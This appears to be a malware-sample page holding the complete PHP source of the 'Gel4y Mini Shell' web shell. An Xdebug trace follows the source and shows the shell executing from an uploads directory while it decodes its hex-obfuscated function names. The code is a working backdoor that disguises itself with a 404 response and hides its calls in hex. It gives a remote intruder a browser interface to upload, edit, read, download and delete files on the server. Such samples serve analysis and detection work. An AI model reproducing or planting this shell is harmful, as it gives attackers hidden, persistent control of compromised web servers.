Jump to:
Screenshot
Attributes
Emails
<?php
error_reporting(0);
http_response_code(404);
define("self", "Gel4y Mini Shell");
$scD = "scandir";
$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
for ($i = 0; $i < count($fc); $i++) {
$fc[$i] = nhx($fc[$i]);
}
if (isset($_GET["p"])) {
$p = nhx($_GET["p"]);
$fc[3](nhx($_GET["p"]));
} else {
$p = $fc[2]();
}
function hex($str)
{
$r = "";
for ($i = 0; $i < strlen($str); $i++) {
$r .= dechex(ord($str[$i]));
}
return $r;
}
function nhx($str)
{
$r = "";
$len = strlen($str) - 1;
for ($i = 0; $i < $len; $i += 2) {
$r .= chr(hexdec($str[$i] . $str[$i + 1]));
}
return $r;
}
function perms($f)
{
$p = fileperms($f);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
function a($msg, $sts = 1, $loc = "")
{
global $p;
$status = $sts == 1 ? "success" : "error";
echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=" . hex($p) . $loc . "\"}})</script>";
}
function deldir($d)
{
global $fc;
if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') {
return;
}
if ($fc[6]($d)) {
array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
rmdir($d);
} else {
unlink($d);
}
}
?>
<!doctype html>
<!-- RandsX aka T1kus_g0t -->
<html lang="en"><head><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?php
echo "Gel4y Mini Shell";
?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?php
echo "Gel4y Mini Shell";
?></a></h3></div><div><span>PHP Version : <?php
echo $fc[1]();
?></span> <br><a href="?p=<?php
echo hex($p) . "&a=" . hex("newFile");
?>">+File</a><a href="?p=<?php
echo hex($p) . "&a=" . hex("newDir");
?>">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : <?php
echo $fc[0]();
?></li></div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form>
<?php
if (isset($_FILES["f"])) {
$n = $_FILES["f"]["name"];
for ($i = 0; $i < count($n); $i++) {
if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) {
a("file uploaded successfully");
} else {
a("file failed to upload", 0);
}
}
}
if (isset($_GET["download"])) {
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: Binary");
header("Content-Length: " . $fc[17](nhx($_GET["n"])));
header("Content-disposition: attachment; filename=\"" . nhx($_GET["n"]) . "\"");
}
?>
</div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
<?php
$ps = $fc[4]("/(\\\\|\\/)/", $p);
foreach ($ps as $k => $v) {
if ($k == 0 && $v == "") {
echo "<a href=\"?p=2f\">~</a>/";
continue;
}
if ($v == "") {
continue;
}
echo "<a href=\"?p=";
for ($i = 0; $i <= $k; $i++) {
echo hex($ps[$i]);
if ($i != $k) {
echo "2f";
}
}
echo "\">{$v}</a>/";
}
?>
</div></div><article class="bg-dark border table-responsive mt-2">
<?php
if (!isset($_GET["a"])) {
?>
<table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
<?php
$scD = $fc[5]($scD($p), [".", ".."]);
foreach ($scD as $d) {
if (!$fc[6]("{$p}/{$d}")) {
continue;
}
echo "<tr><td><a href=\"?p=" . hex("{$p}/{$d}") . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $fc[19]("Y-m-d H:i", $fc[20]("{$p}/{$d}")) . "\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td><td>N/A</td><td><font color=\"" . ($fc[8]("{$p}/{$d}") ? "#00ff00" : (!$fc[9]("{$p}/{$d}") ? "red" : null)) . "\">" . perms("{$p}/{$d}") . "</font></td><td><a href=\"?p=" . hex($p) . "&a=" . hex("rename") . "&n=" . hex($d) . "&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=" . hex($p) . "&a=" . hex("delete") . "&n=" . hex($d) . "\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></td></tr>";
}
foreach ($scD as $f) {
if (!$fc[7]("{$p}/{$f}")) {
continue;
}
$sz = $fc[10]("{$p}/{$f}") / 1024;
$sz = round($sz, 3);
$sz = $sz > 1024 ? round($sz / 1024, 2) . "MB" : $sz . "KB";
echo "<tr><td><a href=\"?p=" . hex($p) . "&a=" . hex("view") . "&n=" . hex($f) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $fc[19]("Y-m-d H:i", $fc[20]("{$p}/{$f}")) . "\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td><td>{$sz}</td><td><font color=\"" . ($fc[8]("{$p}/{$f}") ? "#00ff00" : (!$fc[9]("{$p}/{$f}") ? "red" : null)) . "\">" . perms("{$p}/{$f}") . "</font></td><td><div class=\"d-flex justify-content-between\"><a href=\"?p=" . hex($p) . "&a=" . hex("edit") . "&n=" . hex($f) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a><a href=\"?p=" . hex($p) . "&a=" . hex("rename") . "&n=" . hex($f) . "&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=" . hex($p) . "&n=" . hex($f) . "&download" . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a><a href=\"?p=" . hex($p) . "&a=" . hex("delete") . "&n=" . hex($f) . "\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></div></td></tr>";
}
?></tbody></table>
<?php
} else {
if (isset($_GET["a"])) {
$a = nhx($_GET["a"]);
}
?>
<div class="px-2 py-2">
<?php
if ($a == "delete") {
$loc = $p . '/' . nhx($_GET["n"]);
if ($_GET["t"] == "d") {
deldir($loc);
if (!$fc[12]($loc)) {
a("folder deleted successfully");
} else {
a("failed to delete the folder", 0);
}
}
if ($_GET["t"] == "f") {
$loc = $p . '/' . nhx($_GET["n"]);
unlink($loc);
if (!$fc[12]($loc)) {
a("file deleted successfully");
} else {
a("file to delete the folder", 0);
}
}
}
if ($a == "newDir") {
?>
<h5 class="border p-1 mb-3">New folder</h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php
isset($_POST["s"]) ? $fc[12]("{$p}/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=" . hex("newDir")) : ($fc[15]("{$p}/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0)) : null;
} elseif ($a == "newFile") {
?>
<h5 class="border p-1 mb-3">New file</h5>
<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php
isset($_POST["s"]) ? $fc[12]("{$p}/{$_POST["n"]}") ? a("file name has been used", 0, "&a=" . hex("newFile")) : ($fc[13]("{$p}/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully", 1, "&a=" . hex("view") . "&n=" . hex($_POST["n"])) : a("file failed to create", 0)) : null;
} elseif ($a == "rename") {
?>
<h5 class="border p-1 mb-3">Rename <?php
echo $_GET["t"] == "d" ? "folder" : "file";
?></h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?php
echo nhx($_GET["n"]);
?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php
isset($_POST["s"]) ? $fc[16]($p . '/' . nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0) : null;
} elseif ($a == "edit") {
?>
<h5 class="border p-1 mb-3">Edit file</h5>
<span>File name : <?php
echo nhx($_GET["n"]);
?></span>
<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?php
echo $fc[18]($fc[14]($p . '/' . nhx($_GET["n"])));
?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php
isset($_POST["s"]) ? $fc[13]($p . '/' . nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=" . hex("view") . "&n={$_GET["n"]}") : a("file contents failed to change") : null;
} elseif ($a == "view") {
?>
<h5 class="border p-1 mb-3">View file</h5>
<span>File name : <?php
echo nhx($_GET["n"]);
?></span>
<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?php
echo $fc[18]($fc[14]($p . '/' . nhx($_GET["n"])));
?></textarea></div><?php
}
?></div><?php
}
?></article><div class="bg-dark border text-center mt-2"><small>Copyright © 2021 - Powered By Indonesian Darknet</small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:13:31.330573]
1 0 1 0.000152 393512
1 3 0 0.000583 478832 {main} 1 /var/www/html/uploads/shell.php 0 0
2 4 0 0.000600 478832 error_reporting 0 /var/www/html/uploads/shell.php 2 1 0
2 4 1 0.000616 478872
2 4 R 22527
2 5 0 0.000630 478832 http_response_code 0 /var/www/html/uploads/shell.php 3 1 404
2 5 1 0.000643 478872
2 5 R 200
2 6 0 0.000656 478832 define 0 /var/www/html/uploads/shell.php 4 2 'self' 'Gel4y Mini Shell'
2 6 1 0.000671 478936
2 6 R TRUE
1 A /var/www/html/uploads/shell.php 5 $scD = 'scandir'
1 A /var/www/html/uploads/shell.php 6 $fc = [0 => '7068705f756e616d65', 1 => '70687076657273696f6e', 2 => '676574637764', 3 => '6368646972', 4 => '707265675f73706c6974', 5 => '61727261795f64696666', 6 => '69735f646972', 7 => '69735f66696c65', 8 => '69735f7772697461626c65', 9 => '69735f7265616461626c65', 10 => '66696c6573697a65', 11 => '636f7079', 12 => '66696c655f657869737473', 13 => '66696c655f7075745f636f6e74656e7473', 14 => '66696c655f6765745f636f6e74656e7473', 15 => '6d6b646972', 16 => '72656e616d65', 17 => '737472746f74696d65', 18 => '68746d6c7370656369616c6368617273', 19 => '64617465', 20 => '66696c656d74696d65']
1 A /var/www/html/uploads/shell.php 7 $i = 0
2 7 0 0.000740 478864 nhx 1 /var/www/html/uploads/shell.php 8 1 '7068705f756e616d65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 17
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 8 0 0.000783 478896 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 8 1 0.000796 478944
3 8 R 112
3 9 0 0.000808 478864 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 9 1 0.000820 478904
3 9 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 10 0 0.000853 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '68'
3 10 1 0.000865 478976
3 10 R 104
3 11 0 0.000878 478896 chr 0 /var/www/html/uploads/shell.php 27 1 104
3 11 1 0.000889 478936
3 11 R 'h'
2 A /var/www/html/uploads/shell.php 27 $r .= 'h'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 12 0 0.000919 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 12 1 0.000931 478976
3 12 R 112
3 13 0 0.000943 478896 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 13 1 0.000954 478936
3 13 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 14 0 0.000983 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 14 1 0.000995 478976
3 14 R 95
3 15 0 0.001008 478896 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 15 1 0.001019 478936
3 15 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 16 0 0.001048 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '75'
3 16 1 0.001060 478976
3 16 R 117
3 17 0 0.001072 478896 chr 0 /var/www/html/uploads/shell.php 27 1 117
3 17 1 0.001083 478936
3 17 R 'u'
2 A /var/www/html/uploads/shell.php 27 $r .= 'u'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 18 0 0.001112 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 18 1 0.001124 478976
3 18 R 110
3 19 0 0.001136 478896 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 19 1 0.001147 478936
3 19 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 20 0 0.001176 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 20 1 0.001188 478976
3 20 R 97
3 21 0 0.001200 478896 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 21 1 0.001210 478936
3 21 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 22 0 0.001240 478928 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 22 1 0.001251 478976
3 22 R 109
3 23 0 0.001263 478896 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 23 1 0.001278 478936
3 23 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 24 0 0.001348 478936 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 24 1 0.001361 478984
3 24 R 101
3 25 0 0.001373 478904 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 25 1 0.001384 478944
3 25 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 7 1 0.001413 478904
2 7 R 'php_uname'
1 A /var/www/html/uploads/shell.php 8 $fc[0] = 'php_uname'
1 A /var/www/html/uploads/shell.php 7 $i++
2 26 0 0.001448 480240 nhx 1 /var/www/html/uploads/shell.php 8 1 '70687076657273696f6e'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 19
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 27 0 0.001489 480272 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 27 1 0.001501 480320
3 27 R 112
3 28 0 0.001512 480240 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 28 1 0.001524 480280
3 28 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 29 0 0.001553 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '68'
3 29 1 0.001565 480352
3 29 R 104
3 30 0 0.001577 480272 chr 0 /var/www/html/uploads/shell.php 27 1 104
3 30 1 0.001588 480312
3 30 R 'h'
2 A /var/www/html/uploads/shell.php 27 $r .= 'h'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 31 0 0.001617 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 31 1 0.001628 480352
3 31 R 112
3 32 0 0.001640 480272 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 32 1 0.001651 480312
3 32 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 33 0 0.001679 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '76'
3 33 1 0.001691 480352
3 33 R 118
3 34 0 0.001702 480272 chr 0 /var/www/html/uploads/shell.php 27 1 118
3 34 1 0.001713 480312
3 34 R 'v'
2 A /var/www/html/uploads/shell.php 27 $r .= 'v'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 35 0 0.001742 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 35 1 0.001754 480352
3 35 R 101
3 36 0 0.001766 480272 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 36 1 0.001776 480312
3 36 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 37 0 0.001805 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 37 1 0.001816 480352
3 37 R 114
3 38 0 0.001828 480272 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 38 1 0.001839 480312
3 38 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 39 0 0.001867 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 39 1 0.001878 480352
3 39 R 115
3 40 0 0.001890 480272 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 40 1 0.001901 480312
3 40 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 41 0 0.001929 480304 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 41 1 0.001941 480352
3 41 R 105
3 42 0 0.001953 480272 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 42 1 0.001964 480312
3 42 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 43 0 0.001994 480312 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6f'
3 43 1 0.002005 480360
3 43 R 111
3 44 0 0.002017 480280 chr 0 /var/www/html/uploads/shell.php 27 1 111
3 44 1 0.002028 480320
3 44 R 'o'
2 A /var/www/html/uploads/shell.php 27 $r .= 'o'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 45 0 0.002056 480312 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 45 1 0.002071 480360
3 45 R 110
3 46 0 0.002084 480280 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 46 1 0.002094 480320
3 46 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 26 1 0.002124 480280
2 26 R 'phpversion'
1 A /var/www/html/uploads/shell.php 8 $fc[1] = 'phpversion'
1 A /var/www/html/uploads/shell.php 7 $i++
2 47 0 0.002158 480280 nhx 1 /var/www/html/uploads/shell.php 8 1 '676574637764'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 11
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 48 0 0.002198 480312 hexdec 0 /var/www/html/uploads/shell.php 27 1 '67'
3 48 1 0.002209 480360
3 48 R 103
3 49 0 0.002222 480280 chr 0 /var/www/html/uploads/shell.php 27 1 103
3 49 1 0.002233 480320
3 49 R 'g'
2 A /var/www/html/uploads/shell.php 27 $r .= 'g'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 50 0 0.002263 480344 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 50 1 0.002275 480392
3 50 R 101
3 51 0 0.002287 480312 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 51 1 0.002298 480352
3 51 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 52 0 0.002327 480344 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 52 1 0.002339 480392
3 52 R 116
3 53 0 0.002350 480312 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 53 1 0.002361 480352
3 53 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 54 0 0.002390 480344 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 54 1 0.002402 480392
3 54 R 99
3 55 0 0.002414 480312 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 55 1 0.002425 480352
3 55 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 56 0 0.002454 480344 hexdec 0 /var/www/html/uploads/shell.php 27 1 '77'
3 56 1 0.002465 480392
3 56 R 119
3 57 0 0.002477 480312 chr 0 /var/www/html/uploads/shell.php 27 1 119
3 57 1 0.002488 480352
3 57 R 'w'
2 A /var/www/html/uploads/shell.php 27 $r .= 'w'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 58 0 0.002516 480344 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 58 1 0.002528 480392
3 58 R 100
3 59 0 0.002539 480312 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 59 1 0.002550 480352
3 59 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 47 1 0.002579 480312
2 47 R 'getcwd'
1 A /var/www/html/uploads/shell.php 8 $fc[2] = 'getcwd'
1 A /var/www/html/uploads/shell.php 7 $i++
2 60 0 0.002612 480312 nhx 1 /var/www/html/uploads/shell.php 8 1 '6368646972'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 9
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 61 0 0.002651 480344 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 61 1 0.002662 480392
3 61 R 99
3 62 0 0.002674 480312 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 62 1 0.002685 480352
3 62 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 63 0 0.002714 480376 hexdec 0 /var/www/html/uploads/shell.php 27 1 '68'
3 63 1 0.002725 480424
3 63 R 104
3 64 0 0.002738 480344 chr 0 /var/www/html/uploads/shell.php 27 1 104
3 64 1 0.002757 480384
3 64 R 'h'
2 A /var/www/html/uploads/shell.php 27 $r .= 'h'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 65 0 0.002787 480376 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 65 1 0.002798 480424
3 65 R 100
3 66 0 0.002814 480344 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 66 1 0.002825 480384
3 66 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 67 0 0.002854 480376 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 67 1 0.002865 480424
3 67 R 105
3 68 0 0.002877 480344 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 68 1 0.002888 480384
3 68 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 69 0 0.002977 480376 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 69 1 0.002990 480424
3 69 R 114
3 70 0 0.003002 480344 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 70 1 0.003013 480384
3 70 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 60 1 0.003043 480344
2 60 R 'chdir'
1 A /var/www/html/uploads/shell.php 8 $fc[3] = 'chdir'
1 A /var/www/html/uploads/shell.php 7 $i++
2 71 0 0.003076 480344 nhx 1 /var/www/html/uploads/shell.php 8 1 '707265675f73706c6974'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 19
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 72 0 0.003116 480376 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 72 1 0.003127 480424
3 72 R 112
3 73 0 0.003140 480344 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 73 1 0.003150 480384
3 73 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 74 0 0.003180 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 74 1 0.003191 480456
3 74 R 114
3 75 0 0.003203 480376 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 75 1 0.003214 480416
3 75 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 76 0 0.003250 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 76 1 0.003262 480456
3 76 R 101
3 77 0 0.003274 480376 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 77 1 0.003285 480416
3 77 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 78 0 0.003314 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '67'
3 78 1 0.003325 480456
3 78 R 103
3 79 0 0.003337 480376 chr 0 /var/www/html/uploads/shell.php 27 1 103
3 79 1 0.003348 480416
3 79 R 'g'
2 A /var/www/html/uploads/shell.php 27 $r .= 'g'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 80 0 0.003377 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 80 1 0.003389 480456
3 80 R 95
3 81 0 0.003401 480376 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 81 1 0.003412 480416
3 81 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 82 0 0.003441 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 82 1 0.003452 480456
3 82 R 115
